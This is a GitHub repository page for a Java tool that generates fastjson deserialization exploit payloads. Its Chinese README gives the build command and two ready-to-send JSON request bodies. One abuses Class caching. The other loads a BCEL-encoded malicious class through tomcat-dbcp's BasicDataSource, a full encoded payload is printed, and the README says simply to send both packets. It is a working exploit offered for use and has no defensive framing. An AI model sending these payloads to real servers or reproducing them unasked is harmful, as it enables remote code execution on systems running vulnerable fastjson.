Skip to content
A fastjson payload generator
Java
Branch: master
Clone or download
Latest commit 7dda61b Aug 6, 2019
Permalink
Type Name Latest commit message Commit time
Failed to load latest commit information.
src init Aug 6, 2019
.gitignore init Aug 6, 2019
BcelGenerator.iml init Aug 6, 2019
LICENSE
README.md Update README.md Aug 6, 2019
pom.xml init Aug 6, 2019

README.md

BcelPayloadGenerator

该payload使用tomcat-dbcp中的BasicDataSource,无需另起ldap或者RMI也可以触发fastjson漏洞。

1.准备好EvilConstructor的.class文件,放在任意文件内

2.执行生成payload

命令:

java -cp BcelGenerator-1.0-SNAPSHOT-jar-with-dependencies.jar com.example.App [classpath] [classname]
classpath是EvilConstructor.class所在目录
classname是EvilConstructor.class具体的类的名字

Demo:
java -cp BcelGenerator-1.0-SNAPSHOT-jar-with-dependencies.jar com.example.App file:///D:/EvilConstructor.class EvilConstructor

3.生成Payload

第一个包:

{"name": 
	{
		"@type":"java.lang.Class","val":"com.sun.org.apache.bcel.internal.util.ClassLoader"
	}
}

第二个包:

{"name":{"@type":"java.lang.Class","val":"org.apache.tomcat.dbcp.dbcp2.BasicData
Source"},"f":{"@type":"org.apache.tomcat.dbcp.dbcp2.BasicDataSource", "driverCla
ssName": "org.apache.log4j.spi$$BCEL$$$l$8b$I$A$A$A$A$A$A$AmR$cbN$db$40$U$3d$93$
b8vp$j$f2$80$d0$96$3e$80$bep$40$w$8b$$$a9$baAt$e5$3e$d4$m$ba$605$ZF$e9$d0$c4$8e$
s$T$c4$a2$ff$c3$9a$NT$5d$f4$D$faQm$cf$98$aa$m$g$5b$f7$5e$dd$c79s$ee$d8$3f$7f$7d$
ff$B$e0$r6b$d4p$3f$c6$D$3c$ac$e1$91$8f$x$RVc$dc$c2Z$84$c7$R$9e$I$84$afLn$dck$81j
$da$dd$X$Iv$8aC$z$d0$c8L$ae$dfMG$7dm$f7d$7f$c8J$3b$x$94$i$eeKk$7c$fe$b7$uh$9d$ec
H$k$cb$ad$a1$cc$H$5b$bb$tJ$8f$9d$v$f2m2$b9$cff$o$d0$cav$8f$cdp$a7$c8$t$ceN$95$x$
y$5b$f5$9e$93$ea$cb$5b9$$iJ$r$ab$E$8c$a4$c9$F$96$d2$83k$8c$3dgM$3e$d8$$$a5I$3b$m
$e1$c2$8c$b6$40$dc$x$a6V$e97$c6$cbZ$bcq$e4$L$PH0$878$c2$d3$E$cf$f0$9cl$dcF$rXGJ$
ca$Z$h$q$e8$o$e6E$dc$a0$Sh$5e$N$bf$ef$li$e5$b8$e3U$e9$e34wfD$N$f1$40$bb$7fI$t$ed
f$ff$cd$f8$3b$d2$tZ$J$ac$a736$beV$fa$60$L$a5$t$T$C$gc6$5dy$7d$7bV$w$8d5D$fc$c4$f
e$a9$40$f8$N$e9o3$fb$ca$bc$c2$b8$b4q$B$f1$N$95v$f5$i$c1$a7S$d4$b2$cds$84g$9c$KPG
$93$7fB$V$J$e7$96$R$d2$H$7cC$d6$e7$d8$89$d0$os$87$8cu$cfC$b6$W$bb$f3h$Q$eb$f3$ss
$a0Mk$a2$f2$9bNDX$f0n1$m$be$c3$89K$r$9b4$8f$Qg$a5H$7fXX$W$e6K$e2$e4$b2$89$3b$b8$
5b$c6$7b$e5$d4$f2$lp$8cf$3b$c3$C$A$A", "driverClassLoader":{"@type": "com.sun.or
g.apache.bcel.internal.util.ClassLoader"}}, "age":10}

发两个包过去就行了。

You can’t perform that action at this time.